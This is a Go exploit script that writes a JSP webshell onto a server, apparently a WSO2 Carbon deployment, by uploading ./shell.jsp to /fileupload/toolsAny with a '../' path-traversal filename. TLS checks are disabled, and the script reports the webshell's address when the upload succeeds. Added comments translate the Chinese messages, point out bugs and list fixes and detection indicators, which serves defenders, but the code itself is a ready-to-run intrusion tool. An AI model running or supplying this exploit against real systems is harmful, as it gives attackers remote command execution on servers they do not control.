package main
import (
"bytes"
"crypto/tls"
"fmt"
"io"
"io/ioutil"
"mime/multipart"
"net/http"
"os"
"strings"
)
// main reads one whitespace-delimited base URL from standard input and hands
// it to exp. The prompt text translates to "Please enter the target address,
// e.g. https://127.0.0.1". main passes the value on without checking it, and
// the result of Scanf is discarded.
func main() {
	fmt.Println("请输入目标地址, 如 https://127.0.0.1")
	host := ""
	fmt.Scanf("%s ", &host)
	exp(host)
}
// exp sends a single multipart/form-data POST to host + "/fileupload/toolsAny"
// and reports whether the server answered 200 with a non-empty body.
//
// What the request looks like on the wire, as built below:
//   - one file part whose form field name AND filename are the same relative
//     path, starting with four "../" segments and ending in
//     webapps/authenticationendpoint/cmd.jsp;
//   - the part content is the local file ./shell.jsp;
//   - only two headers are set explicitly: a fixed Firefox 4.0.1 User-Agent
//     and the multipart Content-Type; no cookie or credential is attached;
//   - TLS certificate verification is disabled on the client.
//
// Defensive reading: the upload only has an effect if the receiving handler
// joins the client-supplied name onto its upload directory without rejecting
// ".." segments or path separators. Handlers should take the base name only
// (or resolve the final path and confirm it stays inside the upload root), and
// the upload endpoint should not be reachable without authentication. For
// detection, the visible indicators are POSTs to /fileupload/toolsAny whose
// multipart filename contains "../", the static User-Agent below, and new
// .jsp files appearing under the authenticationendpoint web application.
//
// NOTE(review): the directory layout resembles a WSO2 Carbon deployment; the
// page does not name the product or an advisory, so confirm before relying on it.
// NOTE(review): every error return in this function is discarded, so a failed
// os.Open or client.Do leads to a nil dereference rather than a message.
func exp(host string) {
// Drop one trailing "/" so the path concatenations below do not double it.
host = strings.TrimSuffix(host, "/")
bodyBuf := new(bytes.Buffer)
bodyWriter := multipart.NewWriter(bodyBuf)
// CreateFormFile(fieldname, filename): both arguments carry the traversal
// path. The filename in the part's Content-Disposition header is the value a
// server-side handler would see as the uploaded file's name.
fileWriter, _ := bodyWriter.CreateFormFile("../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp", "../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp")
// The part body is read from ./shell.jsp in the working directory; the open
// error is ignored.
shellfile, _ := os.Open("./shell.jsp")
defer shellfile.Close()
_, _ = io.Copy(fileWriter, shellfile)
// The Content-Type value includes the writer's boundary; Close writes the
// terminating boundary into bodyBuf.
contentType := bodyWriter.FormDataContentType()
bodyWriter.Close()
// InsecureSkipVerify: the client accepts any server certificate.
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
client := &http.Client{Transport: tr}
url := host + "/fileupload/toolsAny"
// The request is created with a nil body; the buffer is attached a few lines
// further down by assigning req.Body directly.
req, _ := http.NewRequest("POST", url, nil)
// Hard-coded User-Agent: a constant string that shows up unchanged in access logs.
req.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1")
req.Header.Set("Content-Type", contentType)
req.Body = ioutil.NopCloser(bodyBuf)
resp, _ := client.Do(req)
// resp is used without a nil check, and the deferred Close is registered only
// after the body has been read.
data, _ := ioutil.ReadAll(resp.Body)
defer resp.Body.Close()
// Success is inferred from status 200 plus any non-empty response body; the
// code does not request the written path to confirm it exists.
if resp.StatusCode == 200 && string(data) != ""{
// Message: "webshell written successfully, address: <host>/authenticationendpoint/cmd.jsp".
fmt.Printf("webshell写入成功, 地址: %v/authenticationendpoint/cmd.jsp\n", host)
} else {
// Message: "webshell write failed", followed by the raw response body.
fmt.Println("webshell写入失败")
fmt.Println(string(data))
}
}